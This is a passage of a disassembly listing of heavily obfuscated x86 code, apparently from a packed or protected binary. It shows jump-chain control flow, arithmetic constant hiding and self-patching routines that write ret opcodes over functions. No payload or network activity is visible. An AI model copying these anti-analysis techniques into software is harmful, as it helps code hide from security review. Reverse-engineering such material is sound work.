; FUNCTION CHUNK AT 00456D60 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458104 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459DEA SIZE 00000005 BYTES

		push	edi
		xor	edi, edx
		jmp	loc_44B862
sub_43FC15	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43FC1D	proc near		; DATA XREF: sub_4469CC+3o

; FUNCTION CHUNK AT 0043B0CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AB69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004581B3 SIZE 0000000A BYTES

		push	esi
		push	0DDCB74E8h
		pop	esi
		sub	esi, 451329F4h
		or	esi, 8A57A264h
		add	esi, ds:4000F8h
		or	esi, 0C12B7FD3h
		jmp	loc_43B0CF
sub_43FC1D	endp

; ---------------------------------------------------------------------------
		mov	[esi], edx
		jmp	sub_4420E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_43FC48:				; CODE XREF: sub_44BFF5+E9E9j
		jz	loc_453304
		jmp	loc_453AAB
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------

loc_43FC53:				; CODE XREF: hvvrg7ie:loc_44FC9Aj
		jnz	loc_4473F9
		jmp	loc_44D38C
; ---------------------------------------------------------------------------

loc_43FC5E:				; CODE XREF: hvvrg7ie:loc_455E08j
		jz	loc_450A5B
		jmp	loc_45390B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43FC69:				; CODE XREF: sub_450434:loc_43C921j
		test	esi, 0E08A8863h
		jmp	loc_43F35F
; END OF FUNCTION CHUNK	FOR sub_450434
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_399. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEE1

loc_43FC75:				; CODE XREF: sub_45AEE1-15153j
		jmp	loc_43EFED
; END OF FUNCTION CHUNK	FOR sub_45AEE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_43FC7A:				; CODE XREF: sub_446966-77FFj
		jmp	loc_455727
; END OF FUNCTION CHUNK	FOR sub_446966

; =============== S U B	R O U T	I N E =======================================



sub_43FC7F	proc near		; CODE XREF: hvvrg7ie:loc_43B320p
					; hvvrg7ie:0044FF3Dj

; FUNCTION CHUNK AT 00452CB1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459416 SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edi
		push	0B2240C5Bh
		pop	edi
		or	edi, 44DAE51Fh
		cmp	edi, 0E0AC8D16h
		jmp	loc_459416
sub_43FC7F	endp

; ---------------------------------------------------------------------------

loc_43FC9B:				; CODE XREF: hvvrg7ie:loc_44970Cj
					; DATA XREF: sub_4496FA+8o
		call	sub_4500E7
		mov	eax, 726FC43Ah
		push	edx
		push	43092320h
		jmp	loc_4393F1
; ---------------------------------------------------------------------------

loc_43FCB0:				; DATA XREF: hvvrg7ie:0044D4DDo
		pop	edx
		xor	edx, edx
		push	edx
		push	eax
		push	0AA8F882Ch
		pop	eax
		rol	eax, 16h
		xor	eax, 0CA5C2206h
		jmp	loc_43E57A
; ---------------------------------------------------------------------------

loc_43FCC9:				; DATA XREF: sub_44DF5A-D110o
		add	edx, 0E84DDCD8h
		xchg	edx, [esp]
		jmp	sub_4489AE
; ---------------------------------------------------------------------------
		mov	eax, 8CC5471Fh
		jmp	loc_441B0A
; ---------------------------------------------------------------------------

loc_43FCE1:				; CODE XREF: hvvrg7ie:00441380j
		and	ebx, 0F4EB25BCh
; START	OF FUNCTION CHUNK FOR sub_451669

loc_43FCE7:				; CODE XREF: sub_451669:loc_441372j
		xor	edi, 0E7DF0207h
		add	eax, edi
		pop	edi
		mov	esi, [eax]
		jmp	loc_44239B
; END OF FUNCTION CHUNK	FOR sub_451669

; =============== S U B	R O U T	I N E =======================================



sub_43FCF7	proc near		; DATA XREF: hvvrg7ie:00444809o
		mov	byte ptr [eax],	0C3h
		jmp	sub_44631F
sub_43FCF7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44631F

loc_43FCFF:				; CODE XREF: sub_44631Fj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		push	edx
		push	0FFEA0FD5h
		pop	edx
		jmp	loc_454784
; END OF FUNCTION CHUNK	FOR sub_44631F
; ---------------------------------------------------------------------------

loc_43FD10:				; CODE XREF: hvvrg7ie:0043E0B7j
		pop	ecx
		rol	ecx, 5
		or	ecx, 9C423651h
		xor	ecx, 0A1BE9DBBh
		add	ecx, 0C3625C3Ah
		jmp	loc_44B22C

; =============== S U B	R O U T	I N E =======================================



sub_43FD2B	proc near		; CODE XREF: hvvrg7ie:0043FD56j
					; sub_451176+292p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00444522 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044528D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004455AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A727 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451E17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045656D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045A7AB SIZE 00000014 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [ebp+eax-100h], 0
		push	2010h
		jmp	loc_44528D
sub_43FD2B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_43FD41:				; CODE XREF: sub_440AD9+132D7j
		jb	loc_44083A
; END OF FUNCTION CHUNK	FOR sub_440AD9
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_43FD47:				; CODE XREF: sub_43AB99:loc_446230j
		push	offset loc_4460CA
		jmp	loc_449FFE
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		mov	eax, 25154B79h
		jmp	sub_43FD2B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43FD5B	proc near		; CODE XREF: sub_447079:loc_458A9Aj

var_1		= byte ptr -1

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_1], al
		call	sub_449DC2

loc_43FD69:				; CODE XREF: sub_4550DA+4CE3j
		jmp	locret_44313E
sub_43FD5B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E532

loc_43FD6E:				; CODE XREF: sub_43E532+12j
		jmp	loc_43A9CF
; END OF FUNCTION CHUNK	FOR sub_43E532
; ---------------------------------------------------------------------------

locret_43FD73:				; CODE XREF: hvvrg7ie:0044B57Ej
		retn
; ---------------------------------------------------------------------------

loc_43FD74:				; CODE XREF: hvvrg7ie:loc_4508CCj
		or	ebp, ebx
		jmp	loc_43FAD1
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-4], 1

loc_43FD82:				; CODE XREF: hvvrg7ie:004395A7j
		push	3FCC3B33h
		pop	eax
		rol	eax, 8
		jmp	loc_445448
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458746

loc_43FD91:				; CODE XREF: sub_458746+Bj
		jmp	loc_447C17
; END OF FUNCTION CHUNK	FOR sub_458746
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585BB

loc_43FD96:				; CODE XREF: sub_4585BB-3F01j
		jmp	loc_43EE01
; END OF FUNCTION CHUNK	FOR sub_4585BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43FD9B:				; CODE XREF: sub_445CCD-35F1j
		jmp	loc_44C3C0
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_43FDA0:				; CODE XREF: hvvrg7ie:00458B9Dj
		cmp	ebp, ebx
		jmp	loc_45B00D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43FDA7:				; CODE XREF: sub_44BEBB-E4EAj
		xchg	eax, [ebx]
		jmp	loc_4461C2
; END OF FUNCTION CHUNK	FOR sub_44BEBB

; =============== S U B	R O U T	I N E =======================================



sub_43FDAE	proc near		; CODE XREF: sub_43F227-3C5p
					; hvvrg7ie:00442F56j

; FUNCTION CHUNK AT 0043C668 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00443D99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B95 SIZE 00000002 BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_446A16
		push	eax
		ror	eax, 1Ah
		push	esi
		jmp	loc_43C668
sub_43FDAE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		and	eax, ebp
		jmp	sub_440944
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFE7

loc_43FDC8:				; CODE XREF: sub_43BFE7:loc_43C979j
		lock xchg edx, [eax]
		or	edx, edx
		jz	nullsub_323

loc_43FDD3:				; CODE XREF: sub_457740-B822j
					; sub_44FB04+Cj
		push	offset sub_44AC6E
		jmp	nullsub_324
; END OF FUNCTION CHUNK	FOR sub_43BFE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_43FDDD:				; CODE XREF: sub_448ECC:loc_43A3F0j
		call	sub_450C5A
		mov	ds:off_41D184, eax
		lea	eax, sub_448ECC
		mov	byte ptr [eax],	0C3h
		jmp	sub_448ECC
; ---------------------------------------------------------------------------

loc_43FDF6:				; CODE XREF: sub_448ECCj
		pop	edx
		jmp	loc_445AC3
; END OF FUNCTION CHUNK	FOR sub_448ECC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_43FDFC:				; CODE XREF: sub_442F6B:loc_43B144j
					; hvvrg7ie:00456B9Fj
		rol	eax, 6
		add	eax, 6F374F84h
		cmp	eax, 0C53039Eh
		jmp	loc_446B9F
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43FE10:				; CODE XREF: sub_45038B-13B49j
		jnb	loc_4403F8
		adc	edi, 755CCA09h
		push	1177065Ch

loc_43FE21:				; CODE XREF: hvvrg7ie:loc_440044j
		mov	edi, 5F06A066h
		jmp	loc_45581A
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_43FE2B:				; CODE XREF: hvvrg7ie:004469FDj
		js	loc_45B2A6

; =============== S U B	R O U T	I N E =======================================



sub_43FE31	proc near		; CODE XREF: sub_44980B-E461p

; FUNCTION CHUNK AT 00444499 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		push	offset loc_452CDA
		jmp	loc_444499
sub_43FE31	endp

; ---------------------------------------------------------------------------

loc_43FE40:				; DATA XREF: sub_44CE90-2679o
		add	ecx, 71485EF4h
		push	ebx
		call	sub_44EDF0

loc_43FE4C:				; CODE XREF: hvvrg7ie:0044198Bj
		jmp	loc_456D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43FE51:				; CODE XREF: sub_44D2F8-EA2Dj
		jnz	loc_454587
		jmp	loc_450C93
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		push	20CA0CAh
		pop	eax
		and	eax, 96313FF3h
		add	eax, 8A09FBE2h
		jmp	loc_44A17E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_43FE73:				; CODE XREF: sub_45889B-1A568j
		jo	loc_44548E

loc_43FE79:				; CODE XREF: sub_45889B:loc_450235j
		call	sub_44722C

loc_43FE7E:				; DATA XREF: sub_44F548+6o
		pop	esi
		push	ecx
		pushf
		push	9D41642Bh
		jmp	loc_44F665
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_43FE8B:				; CODE XREF: hvvrg7ie:0044BA0Fj
					; hvvrg7ie:loc_45501Dj
		call	sub_43FE9B
		retn
; ---------------------------------------------------------------------------

loc_43FE91:				; CODE XREF: hvvrg7ie:00440F87j
		jmp	locret_45597F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_43FE96:				; CODE XREF: sub_44048E-4462j
		jmp	nullsub_53
; END OF FUNCTION CHUNK	FOR sub_44048E

; =============== S U B	R O U T	I N E =======================================



sub_43FE9B	proc near		; CODE XREF: hvvrg7ie:loc_43FE8Bp
					; hvvrg7ie:loc_44EE13p

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00439CB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B900 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443618 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044811D SIZE 00000012 BYTES

		jno	loc_44811D

loc_43FEA1:				; CODE XREF: hvvrg7ie:0043A6C0j
		push	offset loc_453E4F
		jmp	sub_459DCD
sub_43FE9B	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_37. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43FEAC:				; CODE XREF: hvvrg7ie:0044ED69j
		jmp	loc_446547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ADA5

loc_43FEB1:				; CODE XREF: sub_44ADA5+6j
		jmp	loc_43C201
; END OF FUNCTION CHUNK	FOR sub_44ADA5
; ---------------------------------------------------------------------------

loc_43FEB6:				; CODE XREF: hvvrg7ie:0043FBBBj
					; hvvrg7ie:00451646j
		jmp	loc_43956D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_43FEBB:				; CODE XREF: sub_4403D4+18DBEj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_449734
		jmp	loc_44E876
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
		jnz	loc_457FE6
		jmp	sub_442D68
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_409. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_43FED5:				; CODE XREF: sub_4478FE+FA6j
		jmp	loc_44AD83
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------

loc_43FEDA:				; CODE XREF: hvvrg7ie:loc_453F64j
		and	edx, 17B43B3Bh
		add	edx, 97F18291h
		pushf
		call	sub_43C2A3
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43FEEC:				; CODE XREF: sub_43A839+1B787j
		jmp	loc_43A7F4
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_43FEF1:				; CODE XREF: sub_44D4EF+BF93j
		jnb	loc_44717C
; END OF FUNCTION CHUNK	FOR sub_44D4EF

; =============== S U B	R O U T	I N E =======================================



sub_43FEF7	proc near		; CODE XREF: sub_44D4EF:loc_45A7D6j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004396B3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A11E SIZE 00000005 BYTES

		push	ebx
		push	38A9BA3Ch
		pop	ebx
		and	ebx, 0B306CE42h
		jmp	loc_45A11E
sub_43FEF7	endp

; ---------------------------------------------------------------------------
		sbb	edi, esi
		jmp	sub_4416C3
; ---------------------------------------------------------------------------

loc_43FF10:				; DATA XREF: hvvrg7ie:0043E0DBo
		jo	loc_45455B
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_4489AE
		push	832D8FACh
		pop	eax
		and	eax, 63FB99BBh
		jmp	loc_44FE74
; ---------------------------------------------------------------------------

locret_43FF31:				; CODE XREF: hvvrg7ie:loc_452BF5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_43FF32:				; CODE XREF: sub_44646D+E35Cj
		jmp	loc_43E6EF
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------

loc_43FF37:				; CODE XREF: hvvrg7ie:00452AF6j
		mov	[eax], ecx

; =============== S U B	R O U T	I N E =======================================



sub_43FF39	proc near		; CODE XREF: sub_4421DE:loc_453378p
		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		call	sub_4391F1
sub_43FF39	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_43FF43:				; CODE XREF: sub_451DFF-14FC2j
		jmp	loc_442159
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_43FF48:				; CODE XREF: sub_45061E:loc_44A909j
					; sub_450A7A+53AEj
		jnz	loc_45566F
		jmp	loc_4393B7
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_43FF53:				; CODE XREF: sub_43AB99+10C63j
		mov	ecx, edi
		pop	edi
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		mov	eax, 276E7523h
		push	ebx
		push	1441ED2Ch
		pop	ebx
		rol	ebx, 1Bh
		add	ebx, 0D62EA225h
		jmp	loc_457323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43FF73:				; CODE XREF: sub_4413A5:loc_4417C6j
		pop	eax
		rol	eax, 12h
		and	eax, 0F052FEB0h
		sub	eax, ds:4000F8h
		jmp	loc_43D442
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43FF88:				; CODE XREF: sub_450434:loc_44C9E7j
		cmp	ebp, 0E8CF82B6h
		jmp	loc_459A2E
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_43FF93:				; CODE XREF: sub_44E6A5+5DA1j
		pop	esi
		xor	esi, 69E63A2h
		and	esi, 78434205h
		rol	esi, 0Ah
		add	esi, 0FB43B363h
		push	offset sub_4407B7
		jmp	loc_44D9BD
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_43FFB3:				; CODE XREF: sub_456A52-1243j
		jno	loc_44B0AE
		pop	edi

loc_43FFBA:				; CODE XREF: sub_456A52:loc_445B57j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4585E1
		jmp	loc_456939
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_43FFCB:				; CODE XREF: sub_445B46-C6D8j
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44F7CF
		push	8116EBB6h
		jmp	loc_45B5F0
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A3D5

loc_43FFDF:				; CODE XREF: sub_43A3D5:loc_43B777j
		add	eax, ebp
		push	offset sub_43E741
		jmp	loc_44C66F
; END OF FUNCTION CHUNK	FOR sub_43A3D5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_462. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_43FFEC:				; CODE XREF: sub_45AAC8-1788Bj
		jmp	loc_457463
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------

loc_43FFF1:				; CODE XREF: hvvrg7ie:0043D04Dj
		or	eax, edx
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_43FFF3:				; CODE XREF: sub_44934B:loc_43D029j
		or	edx, 0DAD3C645h
		add	edx, 7A2497D9h
		xor	edx, 7CBB5374h
		jmp	loc_43AA01
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44000A:				; CODE XREF: sub_43D285+16B36j
		jnz	loc_44ED91
		jmp	loc_43DFA3
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_440015:				; CODE XREF: sub_448BC0:loc_458C86j
		jge	loc_444C1A
		or	edi, 0E6C0CABh
		sub	edi, esi
		xor	edx, eax
		sub	edi, 0CD28B2C8h
		jmp	loc_444C1A
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
		xchg	ecx, edi
		jmp	sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_440037:				; CODE XREF: sub_43B9C9:loc_4494B4j
		rol	edi, 15h
		mov	ebx, 0AA23AEBBh
		jmp	loc_454298
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------

loc_440044:				; CODE XREF: hvvrg7ie:00452899j
		jg	loc_43FE21

; =============== S U B	R O U T	I N E =======================================



sub_44004A	proc near		; CODE XREF: sub_453422+6316p

; FUNCTION CHUNK AT 00439EE0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043DA4D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445286 SIZE 00000002 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	edx, 680AE0A7h
		jmp	loc_439EE0
sub_44004A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_440059	proc near		; CODE XREF: hvvrg7ie:0043B334j
					; sub_454789-3478p

; FUNCTION CHUNK AT 0044D159 SIZE 00000007 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	[ebp-4], eax
		mov	eax, offset dword_453878
		call	sub_44D160
		jmp	loc_44D159
sub_440059	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44006F:				; CODE XREF: sub_43F227+15E98j
		jz	loc_4500A1
		jmp	loc_45408D
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_44007A	proc near		; DATA XREF: hvvrg7ie:004476ACo

; FUNCTION CHUNK AT 00459ECE SIZE 00000005 BYTES

		push	634982D6h
		pop	eax
		or	eax, 0FCCF5FFCh
		push	offset loc_455572
		jmp	loc_459ECE
sub_44007A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_440090:				; CODE XREF: sub_43D30A+11986j
		jz	loc_43E8A9
		jmp	loc_45ACE5
; END OF FUNCTION CHUNK	FOR sub_43D30A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_414. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449387

loc_44009C:				; CODE XREF: sub_449387-38F4j
		jmp	loc_44439E
; END OF FUNCTION CHUNK	FOR sub_449387
; ---------------------------------------------------------------------------
		and	ecx, 40FB6C6h
		pushf
		jmp	sub_449924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_4400AD:				; CODE XREF: sub_450D8D:loc_453F5Fj
		pop	ecx
		shl	eax, 3
		mov	edx, [ebp+8]
		or	[edx-8], eax
; END OF FUNCTION CHUNK	FOR sub_450D8D
; START	OF FUNCTION CHUNK FOR sub_452585

loc_4400B7:				; CODE XREF: sub_452585-BA79j
					; sub_452585:loc_452787j ...
		jnb	loc_44DA98
		cmp	dword ptr [ebp-14h], 4
		jnz	loc_44108A
		mov	eax, [ebp+8]
		jmp	loc_44D7DE
; END OF FUNCTION CHUNK	FOR sub_452585
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_4400CF:				; CODE XREF: sub_43EB47-F6Fj
		add	eax, 13BBBDA5h
		mov	eax, [eax]
		cmp	eax, ds:dword_43D708
		jz	loc_43FA8C
		jmp	loc_451DFA
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------

loc_4400E8:				; CODE XREF: hvvrg7ie:004517F4j
		jo	loc_44B3DD

; =============== S U B	R O U T	I N E =======================================



sub_4400EE	proc near		; CODE XREF: hvvrg7ie:0044A143p
		xchg	edx, [esp+0]
		pop	edx
		mov	dword ptr [ebp-8], 1
sub_4400EE	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43FA83

loc_4400F9:				; CODE XREF: hvvrg7ie:004395B3j
					; sub_43FA83+10j
		push	77641345h
		pop	eax
		sub	eax, 0D8098AB8h
		jmp	loc_440489
; END OF FUNCTION CHUNK	FOR sub_43FA83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_44010A:				; CODE XREF: hvvrg7ie:00453B64j
					; sub_458374:loc_458DB7j
		and	eax, 0F82C7324h
		jns	loc_455C3F
		popf
		mov	edx, 0B2CD88F3h
		jmp	loc_444F4F
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------
		jle	loc_43ECC8
		jmp	sub_455D5E
; ---------------------------------------------------------------------------

loc_44012C:				; CODE XREF: hvvrg7ie:loc_44C0C4j
					; hvvrg7ie:0044C0DEj
		add	ebx, 470B8A9Fh
		xchg	ebx, [esp]
		jmp	loc_440FAE
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_456B5D
		jmp	loc_4555CD
; ---------------------------------------------------------------------------

loc_440147:				; CODE XREF: hvvrg7ie:0044725Dj
					; hvvrg7ie:00453E6Aj
		push	edx
		push	0C753F63Dh
		pop	edx
		or	edx, 399DE2D4h
		xor	edx, 9D2FBA1Fh
		add	edx, ecx
		jmp	loc_4483A1
; ---------------------------------------------------------------------------
		push	2577E9CDh
		pop	eax
		and	eax, ds:4000FAh
		rol	eax, 1Eh
		jmp	loc_43ED27
; ---------------------------------------------------------------------------

loc_440175:				; CODE XREF: hvvrg7ie:00456167j
		jb	loc_449707

; =============== S U B	R O U T	I N E =======================================



sub_44017B	proc near		; CODE XREF: hvvrg7ie:0045A62Cp
		xchg	edx, [esp+0]
		pop	edx
		lea	eax, sub_4507AA
		mov	byte ptr [eax],	0C3h
		jmp	sub_4507AA
sub_44017B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_44018D:				; CODE XREF: sub_43DEC3j
		mov	eax, [esp+4+var_4]
		jmp	loc_4397E9
; END OF FUNCTION CHUNK	FOR sub_43DEC3

; =============== S U B	R O U T	I N E =======================================



sub_440195	proc near		; DATA XREF: hvvrg7ie:00450F4Bo

; FUNCTION CHUNK AT 0043CAB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445AFF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445E73 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447074 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479D5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448D7D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450AC7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004512CD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459864 SIZE 00000005 BYTES

		test	al, al
		jz	loc_4512CD
		jmp	loc_447074
sub_440195	endp

; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 1600Bh, 25E9CF03h, 0C3FFFFEDh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_4401B0:				; CODE XREF: sub_45202B-8F7Ej
		jmp	loc_43DDD1
; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_4401B5:				; CODE XREF: sub_4533F2:loc_44DEA1j
		xor	eax, 0E9F8A129h
		ror	eax, 17h
		mov	edx, [esp+0]
		push	edi
		jmp	loc_44AF10
; END OF FUNCTION CHUNK	FOR sub_4533F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS	KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_223. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4401C9	proc near		; CODE XREF: hvvrg7ie:00441885j
					; sub_43C0DE+1C6EEp

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	esi, [esp-4+arg_0]
		jmp	sub_44059F
sub_4401C9	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_502. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C989

loc_4401D6:				; CODE XREF: sub_43C989+13B8Bj
		jmp	loc_44083A
; END OF FUNCTION CHUNK	FOR sub_43C989

; =============== S U B	R O U T	I N E =======================================



sub_4401DB	proc near		; CODE XREF: sub_4483DA+Ap
					; hvvrg7ie:0045957Cj
		xchg	edx, [esp+0]
		pop	edx

loc_4401DF:				; CODE XREF: hvvrg7ie:loc_45B00Dj
		push	8C218CE4h
		pop	edx
		and	edx, 59F54CA8h
		call	sub_444D0E
sub_4401DB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43D16B

